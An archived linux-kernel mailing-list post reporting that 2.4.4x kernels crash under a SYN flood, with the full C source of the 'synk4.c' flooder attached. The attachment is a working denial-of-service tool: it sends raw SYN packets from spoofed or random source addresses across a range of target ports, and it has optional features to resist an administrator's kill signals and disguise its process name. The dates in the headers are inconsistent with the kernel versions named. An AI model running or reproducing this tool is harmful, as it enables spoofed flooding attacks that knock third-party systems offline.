* kernels 2.4.4[2345] crash when flooded with synk4.c
@ 2000-02-14 16:42 Catalin Muresan
0 siblings, 0 replies; only message in thread
From: Catalin Muresan @ 2000-02-14 16:42 UTC (permalink / raw)
To: linux-kernel
[-- Attachment #1: Type: text/plain, Size: 141 bytes --]
oops, I forgot to attach the source.
--
Catalin Muresan
CODEC Electronic Products
Internet Services Department
1916723.63 1747895.57
[-- Attachment #2: synk4.c --]
[-- Type: text/plain, Size: 7699 bytes --]
/* Syn Flooder by Zakath
* TCP Functions by trurl_ (thanks man).
* Some more code by Zakath.
* Speed/Misc Tweaks/Enhancments -- ultima
* Nice Interface -- ultima
* Random IP Spoofing Mode -- ultima
* How To Use:
* Usage is simple. srcaddr is the IP the packets will be spoofed from.
* dstaddr is the target machine you are sending the packets to.
* low and high ports are the ports you want to send the packets to.
* Random IP Spoofing Mode: Instead of typing in a source address,
* just use '0'. This will engage the Random IP Spoofing mode, and
* the source address will be a random IP instead of a fixed ip.
* Released: [4.29.97]
* To compile: cc -o synk4 synk4.c
*
*/
#include <signal.h>
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
/* These can be handy if you want to run the flooder while the admin is on
* this way, it makes it MUCH harder for him to kill your flooder */
/* Ignores all signals except Segfault */
// #define HEALTHY
/* Ignores Segfault */
// #define NOSEGV
/* Changes what shows up in ps -aux to whatever this is defined to */
// #define HIDDEN "vi .cshrc"
#define SEQ 0x28376839
#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))
unsigned long send_seq, ack_seq, srcport;
char flood = 0;
int sock, ssock, curc, cnt;
/* Check Sum */
unsigned short ip_sum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
void sig_exit(int crap)
{
#ifndef HEALTHY
printf("^[[H^[[JSignal Caught. Exiting Cleanly.\n");
exit(crap);
#endif
}
void sig_segv(int crap)
{
#ifndef NOSEGV
printf("^[[H^[[JSegmentation Violation Caught. Exiting Cleanly.\n");
exit(crap);
#endif
}
unsigned long getaddr(char *name)
{
struct hostent *hep;
hep = gethostbyname(name);
if (!hep) {
fprintf(stderr, "Unknown host %s\n", name);
exit(1);
}
return *(unsigned long *) hep->h_addr;
}
void send_tcp_segment(struct iphdr *ih, struct tcphdr *th, char *data,
int dlen)
{
char buf[65536];
struct { /* rfc 793 tcp pseudo-header */
unsigned long saddr, daddr;
char mbz;
char ptcl;
unsigned short tcpl;
} ph;
struct sockaddr_in sin; /* how necessary is this, given that the destination
address is already in the ip header? */
ph.saddr = ih->saddr;
ph.daddr = ih->daddr;
ph.mbz = 0;
ph.ptcl = IPPROTO_TCP;
ph.tcpl = htons(sizeof(*th) + dlen);
memcpy(buf, &ph, sizeof(ph));
memcpy(buf + sizeof(ph), th, sizeof(*th));
memcpy(buf + sizeof(ph) + sizeof(*th), data, dlen);
memset(buf + sizeof(ph) + sizeof(*th) + dlen, 0, 4);
th->check = ip_sum(buf, (sizeof(ph) + sizeof(*th) + dlen + 1) & ~1);
memcpy(buf, ih, 4 * ih->ihl);
memcpy(buf + 4 * ih->ihl, th, sizeof(*th));
memcpy(buf + 4 * ih->ihl + sizeof(*th), data, dlen);
memset(buf + 4 * ih->ihl + sizeof(*th) + dlen, 0, 4);
ih->check = ip_sum(buf, (4 * ih->ihl + sizeof(*th) + dlen + 1) & ~1);
memcpy(buf, ih, 4 * ih->ihl);
sin.sin_family = AF_INET;
sin.sin_port = th->dest;
sin.sin_addr.s_addr = ih->daddr;
if (sendto
(ssock, buf, 4 * ih->ihl + sizeof(*th) + dlen, 0, &sin,
sizeof(sin)) < 0) {
printf("Error sending syn packet.\n");
perror("");
exit(1);
}
}
unsigned long spoof_open(unsigned long my_ip, unsigned long their_ip,
unsigned short port)
{
int i, s;
struct iphdr ih;
struct tcphdr th;
struct sockaddr_in sin;
int sinsize;
unsigned short myport = 6969;
char buf[1024];
struct timeval tv;
ih.version = 4;
ih.ihl = 5;
ih.tos = 0; /* XXX is this normal? */
ih.tot_len = sizeof(ih) + sizeof(th);
ih.id = htons(random());
ih.frag_off = 0;
ih.ttl = 30;
ih.protocol = IPPROTO_TCP;
ih.check = 0;
ih.saddr = my_ip;
ih.daddr = their_ip;
th.source = htons(srcport);
th.dest = htons(port);
th.seq = htonl(SEQ);
th.doff = sizeof(th) / 4;
th.ack_seq = 0;
th.res1 = 0;
th.fin = 0;
th.syn = 1;
th.rst = 0;
th.psh = 0;
th.ack = 0;
th.urg = 0;
// th.res2=0;
th.window = htons(65535);
th.check = 0;
th.urg_ptr = 0;
gettimeofday(&tv, 0);
send_tcp_segment(&ih, &th, "", 0);
send_seq = SEQ + 1 + strlen(buf);
}
void upsc()
{
int i;
char schar[5] = "|/-\\";
printf("^[[H^[[1;30m[^[[1;31m%c^[[1;30m]^[[0m %d", schar[cnt], curc);
cnt++;
cnt %= 4;
for (i = 0; i < 26; i++) {
i++;
curc++;
}
}
void init_signals()
{
// Every Signal known to man. If one gives you an error, comment it out!
signal(SIGHUP, sig_exit);
signal(SIGINT, sig_exit);
signal(SIGQUIT, sig_exit);
signal(SIGILL, sig_exit);
signal(SIGTRAP, sig_exit);
signal(SIGIOT, sig_exit);
signal(SIGBUS, sig_exit);
signal(SIGFPE, sig_exit);
signal(SIGKILL, sig_exit);
signal(SIGUSR1, sig_exit);
signal(SIGSEGV, sig_segv);
signal(SIGUSR2, sig_exit);
signal(SIGPIPE, sig_exit);
signal(SIGALRM, sig_exit);
signal(SIGTERM, sig_exit);
signal(SIGCHLD, sig_exit);
signal(SIGCONT, sig_exit);
signal(SIGSTOP, sig_exit);
signal(SIGTSTP, sig_exit);
signal(SIGTTIN, sig_exit);
signal(SIGTTOU, sig_exit);
signal(SIGURG, sig_exit);
signal(SIGXCPU, sig_exit);
signal(SIGXFSZ, sig_exit);
signal(SIGVTALRM, sig_exit);
signal(SIGPROF, sig_exit);
signal(SIGWINCH, sig_exit);
signal(SIGIO, sig_exit);
signal(SIGPWR, sig_exit);
}
main(int argc, char **argv)
{
int i, x, max, floodloop, diff, urip, a, b, c, d;
unsigned long them, me_fake;
unsigned lowport, highport;
char buf[1024], *junk;
init_signals();
#ifdef HIDDEN
for (i = argc - 1; i >= 0; i--)
/* Some people like bzero...i prefer memset :) */
memset(argv[i], 0, strlen(argv[i]));
strcpy(argv[0], HIDDEN);
#endif
if (argc < 5) {
printf("Usage: %s srcaddr dstaddr low high\n", argv[0]);
printf(" If srcaddr is 0, random addresses will be used\n\n\n");
exit(1);
}
if (atoi(argv[1]) == 0)
urip = 1;
else
me_fake = getaddr(argv[1]);
them = getaddr(argv[2]);
lowport = atoi(argv[3]);
highport = atoi(argv[4]);
srandom(time(0));
ssock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (ssock < 0) {
perror("socket (raw)");
exit(1);
}
sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if (sock < 0) {
perror("socket");
exit(1);
}
junk = (char *) malloc(1024);
max = 1500;
i = 1;
diff = (highport - lowport);
if (diff > -1) {
printf
("^[[H^[[J\n\nCopyright (c) 1980, 1983, 1986, 1988, 1990, 1991 The Regents of the University\n of California. All Rights Reserved.");
for (i = 1; i > 0; i++) {
srandom((time(0) + i));
srcport = getrandom(1, max) + 1000;
for (x = lowport; x <= highport; x++) {
if (urip == 1) {
a = getrandom(0, 255);
b = getrandom(0, 255);
c = getrandom(0, 255);
d = getrandom(0, 255);
sprintf(junk, "%i.%i.%i.%i", a, b, c, d);
me_fake = getaddr(junk);
}
spoof_open( /*0xe1e26d0a */ me_fake, them, x);
/* A fair delay. Good for a 28.8 connection */
// usleep(300);
if (!(floodloop = (floodloop + 1) % (diff + 1))) {
upsc();
fflush(stdout);
}
}
}
} else {
printf("High port must be greater than Low port.\n");
exit(1);
}
}
^ permalink raw reply [flat|nested] only message in thread
only message in thread, other threads:[~2000-02-14 13:26 UTC | newest]
Thread overview: (only message) (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2000-02-14 16:42 kernels 2.4.4[2345] crash when flooded with synk4.c Catalin Muresan
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox